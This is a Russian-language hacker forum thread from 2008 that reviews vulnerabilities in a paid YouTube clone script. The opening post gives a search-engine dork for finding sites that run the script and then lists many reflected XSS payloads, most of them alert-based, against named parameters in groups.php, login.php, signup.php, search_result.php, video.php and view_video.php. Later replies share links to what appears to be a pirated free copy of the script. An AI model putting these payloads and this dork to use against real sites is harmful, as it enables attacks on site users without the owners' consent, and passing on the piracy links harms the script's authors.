![]() |
Обзор уязвимостей [YouTube]
Обзор уязвимостей [YouTube] Clone Script SITE: http://www.hispah.com/index.php?act=viewProd&productId=20 DORK: allinurl:"channel_detail.php?chid=" PRICE: 14.99$ Начнем с самого приятного. Нашол не я, у большинства сайтов уже фикс.Cross Site Scripting (XSS) Author: Dimi4 Found: 14.10.2008 Script: groups.php Уязвимая переменная: catgy Пример: Код:
/groups.php?catgy=<ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&chid=10Код:
/groups.php?catgy=%3C/textarea%3E%3CScRiPt%20%0a%0d%3Ealert(/xek/)%3B%3C/ScRiPt%3E&chid=10Код:
/groups.php?b=fr&catgy=email@some<ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>domain.comScript:login.php Уязвимая переменная:username Пример: Код:
>'><ScRiPt>alert(/xek/);</ScRiPt>Код:
POST /login.php?next=friends HTTP/1.0Script: search_result.php Уязвимая переменная: search_id,search_type Пример: Код:
/search_result.php?PHPSESSID=3dd798ef2773154ae18238b238fb3fab&search_id=<ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&search_type=relatedКод:
/search_result.php?search_id=-&search_type=>'><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&page=1&sort=adddateScript: signup.php Уязвимая переменная: next,add,email,username, Пример: Код:
/signup.php?next=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>Код:
/signup.php?next=friends&add=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>Код:
POST /signup.php?next=friends HTTP/1.0Код:
POST /signup.php?next=friends HTTP/1.0Script: video.php Уязвимая переменная: viewtype,category Пример: Код:
video.php?category=md&viewtype=>'><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>Код HTML:
/video.php?category=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>Script: /view_video.php Уязвимая переменная: page,viewkey,category Пример: Код:
view_video.php?viewkey=013ac554571fbd180e1c&page=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&viewtype=detailed&category=md&action=addfavourКод:
view_video.php?viewkey=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>Код:
view_video.php?viewkey=013ac554571fbd180e1c&page=1&viewtype=detailed&category=>"><ScRiPt%20%0a%0d>alert(387790782)%3B</ScRiPt>ВСЕ УЯЗВИМОСТИ НАЙДЕНЫ МНОЮ, ЗА ИСКЛЮЧЕНИЕМ ПЕРВОГО ЕКСПЛОЙТА |
а сам движок где?))
|
Цитата:
Реально все уязвимости найдены мной. Сегодня обработал до конца что хотел. Почму такий интерес к скрипту? Мой пров его юзает (: |
Цитата:
|
платный походу)
|
http://denied-root.ru/showthread.php?t=1404 Вот вам ютюб бесплатно, даже сам тестил скрин смотрите =))
Качаем так сказать бесплатно |
может на slil зальешь))?)
|
Димы4 хеккер!
|
ловите
http://slil.ru/26334216 http://upwap.ru/219949 http://ifolder.ru/9080970 |
Мой скрин теста)
http://s56.radikal.ru/i154/0810/a9/e03297afa296.jpg |
| Время: 04:18 |